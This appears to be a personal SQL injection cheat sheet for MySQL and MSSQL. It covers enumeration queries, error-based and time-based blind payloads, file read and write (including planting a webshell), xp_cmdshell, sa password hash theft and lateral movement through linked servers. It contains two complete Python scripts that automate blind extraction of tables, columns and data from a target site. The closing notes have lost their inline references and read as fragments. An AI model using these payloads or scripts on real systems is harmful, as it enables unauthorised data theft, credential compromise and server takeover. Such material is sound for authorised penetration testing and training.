Out-of-band: No access (needs to redirect to DNS, for example)
Steps:
Find number of columns (order by or union) and type.
Find TRUE and FALSE conditions.
If not possible because they have same output try with error and time delay.
Finally try with Out-of-band.
Find Vectors (union …) and Boundaries (’<VECTORS>-- -)
, , ,
Tools
Tool
Details
Identify MySQL
SELECT @@version
In-band, If it is not MySQL it returns an error
SELECT SLEEP(5)
Blind, If it is not MySQL it returns an error
Enumeration DB
@@version / version()
MySQL version
database()
Get the current database in use
INFORMATION_SCHEMA
User & Privileges
user() / current_user() / user FROM mysql.user
Get the current user in use
SELECT super_priv FROM mysql.user WHERE user="<NAME>"
SELECT grantee, privilege_type FROM information_schema.user_privileges WHERE grantee="''@'localhost'"
Action
show variables like "secure_file_priv";
MySQL has secure_file_priv default to /var/lib/mysql-files or NULL on some modern configs.
READ
SELECT LOAD_FILE(<PATH>)
WRITESELECT '<STRING>' INTO OUTFILE '<PATH>'
or
SELECT FROM_BASE64(“<BASE64>” ) INTO OUTFILE '<PATH>'
Payload
Table
SELECT table_name FROM information_schema.tables WHERE table_schema = DATABASE() LIMIT 1 OFFSET 0
Column
SELECT column_name FROM information_schema.columns WHERE table_name = '<TABELLA>' LIMIT 1 OFFSET 0
Error
SELECT count(*), concat(( <PAYLOAD_TO_PRINT> ), 0x20 , floor(rand(0)*2)) as x FROM information_schema.tables group by x; -- -
Sometimes in Blind SQLi the condition true and false generate the same output. You can, however, use the Error-Base SQLi to get the true and false condition.
xyz' AND (SELECT CASE WHEN (1=2) THEN 1/0 ELSE 'a' END)='a
xyz' AND (SELECT CASE WHEN (1=1) THEN 1/0 ELSE 'a' END)='a
# example
xyz' AND (SELECT CASE WHEN (Username = 'Administrator' AND SUBSTRING(Password, {}, 1) = '{}') THEN 1/0 ELSE 'a' END FROM Users)='a
# oracle
xyz' AND (SELECT CASE WHEN SUBSTR(password,{},1)='{}' THEN TO_CHAR(1/0) ELSE 'a' END FROM users WHERE username='administrator')='a
Blind with Hex
For the code
DICTIONARY = '0123456789abcdef'
STRING = ""
WHILE until it doesn't match anything in the dictionary:
For each <X> in DICTIONARY:
1) PAYLOAD = - In-Band Payload (what I want to read with blind technique)
- Returned in HEX().
- Renamed as elment.
es. SELECT HEX(<column>) AS element FROM <table> LIMIT 1 OFFSET 0
2) K' and (SELECT 1 FROM (PAYLOAD) as payload WHERE element LIKE 'STRING<X>%') =1 -- -
3) If we have the true condition:
STRING += X
BREAK
else:
BREAK
Print with: bytes.fromhex(STRING).decode()
Time
Substitute the SELECT 1 above with SLEEP(1)
MyMultipleBlind
Change parameters such as URL, error, the sendReq function, and payloads with your own Vectors and Boundaries.
import requests, sys, argparse
s = requests.session()
proxy = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
URL = '<URL>'
error = 'Invalid username or password'
def sendReq(payload):
data = {
"username": payload,
"password": "RANDOM"
}
r = s.post(f'{URL}/', data=data) #json=data
return error not in r.text
#* toDo = 0 -> TABLE
#* toDo = 1 -> COLUMN
#* toDo = 2 -> DATA
def SQLi(toDo, tabella, colonna, quanti):
print("[!] Searching", end=' ')
DICTIONARY = '0123456789abcdef'
KNOW = [tabella, colonna, ""]
# HOW MUCH DATA TO EXTRACT
for n in range(quanti):
while True:
# CHECK EVERY CHARACTER
for c in DICTIONARY:
# SET PAYLOAD BY TYPE
if toDo == 0:
COSA = f"SELECT HEX(table_name) as element FROM information_schema.tables WHERE table_schema = DATABASE() LIMIT 1 OFFSET {n}"
elif toDo == 1:
COSA = f"SELECT HEX(column_name) as element FROM information_schema.columns WHERE table_name = '{tabella}' LIMIT 1 OFFSET {n}"
elif toDo == 2:
COSA = f"SELECT HEX({colonna}) as element FROM {tabella} LIMIT 1 OFFSET {n}"
know = KNOW[toDo]
# PAYLOAD
PAYLOAD = f"999' or (SELECT 1 FROM ({COSA}) as payload WHERE element LIKE '{know}{c}%')=1 limit 1 offset 0 -- -"
# SEND PAYLOAD
if sendReq(PAYLOAD):
KNOW[toDo] += c
sys.stdout.flush()
print(".", end='')
break
# CHECK IF IT IS THE END OF DATA
else:
if KNOW[toDo] != "":
print("\n[+] FOUND: ", bytes.fromhex(KNOW[toDo]), end=' ')
break
# IF THERE ARE NO OTHER DATA
if KNOW[toDo] == "":
print("\n[!] End search.")
sys.stdout.flush()
break
else: KNOW[toDo] = ''
parser = argparse.ArgumentParser(description='SQL injection.')
parser.add_argument('-t', metavar='TABLE', default='', help='Specify table for column extraction.')
parser.add_argument('-c', metavar='COLUMN', default='', help='Specify column for data extraction, to be used with -t.')
parser.add_argument('-n', metavar='NUMBER', default=10, help='Specify how much data to extract.')
args = parser.parse_args()
mode = 0
if args.t: mode += 1
if args.c: mode += 1
if args.c and not args.t:
parser.error("-c must be specified along with -t.")
# RUN
SQLi(mode, args.t, args.c, args.n)
MyTimeBased
Change parameters such as IP_PORT and payloads with your own Vectors and Boundaries. Inserting your own payload (es. PAYLOAD_COLUMNS or PAYLOAD_DATA) into PAYLOAD_BLIND.
import requests
import time
from urllib.parse import quote
IP_PORT = "<IP>:<PORT>"
# PAYLOAD
PAYLOAD_COLUMNS = "SELECT HEX(column_name) as element FROM information_schema.columns WHERE table_name = '<?>' LIMIT 1 OFFSET 0"
PAYLOAD_DATA = f"SELECT Hex(<?>) as element FROM <?> LIMIT 1 OFFSET 0"
DICTIONARY = "0123456789abcdef"
STRING = ""
def send(payload):
return requests.get(f"http://{IP_PORT}/<PAGE>", json=payload)
end = False
while not end:
for d in DICTIONARY:
PAYLOAD_BLIND = {
"id": f"1 AND (SELECT SLEEP(1) FROM ({PAYLOAD_DATA}) as payload WHERE element LIKE '{STRING}{d}%')"
}
if send(PAYLOAD_BLIND).elapsed.total_seconds()>= 1:
print("FOUND : ", d, " - ", STRING)
STRING += d
break
time.sleep(0.05)
else:
end = True
print("\n[+] LEAK:\t", bytes.fromhex(STRING).decode())
Credentials sa
Check if it is possible to recover the password hash of the sa account, which has full control over the DBMS.
SELECT name, password FROM master..sysxlogins # MSSQL Server 2000
SELECT name, password_hash FROM master.sys.sql_logins # >= 2005
xp_cmdshell
Procedure that allows you to execute commands, but is disabled by default and requires sa privileges (both to execute commands and to enable/disable xp_cmdshell).
With the special permission, called IMPERSONATE, it is possible to impersonate other users by assuming their permissions. Administrators can impersonate anyone, while for others, privileges must be explicitly assigned.
Tip: Do in DB master
USE master
Identifying users we can impersonate
SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE'
If we can access a SQL Server with a linked server configured, we may be able to move laterally on that database server. We can try to execute commands if we have the appropriate permissions.
Note: It is possible that only some users can execute commands on those DB links, try with everyone, even impersonated ones.
Identify connected servers (try all)
SELECT srvname, isremote FROM sysservers
Executing commands
EXECUTE('select @@servername, @@version, system_user, is_srvrolemember(''sysadmin'')') AT [10.0.0.12\SQLEXPRESS]
Note: If we need to use quotes in our query to run on the linked server, we need to use two single quotes to escape the single quote.
Payload
Blind with time delay
'; IF (1=2) WAITFOR DELAY '0:0:10'--
'; IF (1=1) WAITFOR DELAY '0:0:10'--
# example
'; IF (SELECT COUNT(Username) FROM Users WHERE Username = 'Administrator' AND SUBSTRING(Password, {}, 1) > '{}') = 1 WAITFOR DELAY '0:0:{delay}'--
Automatic SQL injection and database takeover tool.
See , or the .
(Uses a syntax similar to curl)
Database that contains all the information.
Main tables:
(SCHEMA_NAME db name)
(TABLE_NAME,TABLE_SCHEMA)
(TABLE_NAME,TABLE_SCHEMA,COLUMN_NAME)
(variable_name,variable_value)
Dot Notation (.) to refer to other databases.
View if a user is DBA, Database Administrator with Administrator privileges.
To see all fields:
View all privileges of a user. Check if you have FILE that allows me to read and write files.
To see all fields:
See .
The variable determines from where you can read and write (NULL=no files/directories, EMPTY=entire file system). Read the value of the variable from INFORMATION_SCHEMA.GLOBAL_VARIABLES.
MariaDB has secure_file_priv default to EMPTY.
If the user has FILE privilege and secure_file_priv empty or with interesting path, it is possible to read files via function.
Also used to print source code.
If the user has FILE privilege and secure_file_priv empty or with interesting path, you can write the output of a select to a file with .
With long or binary files use base64.
Also used to write webshell on the target.
With
We can retrieve and steal the password hash of the MSSQL service account, under which the DB is running, which is different from the one in MSSQL.
To do this we use .
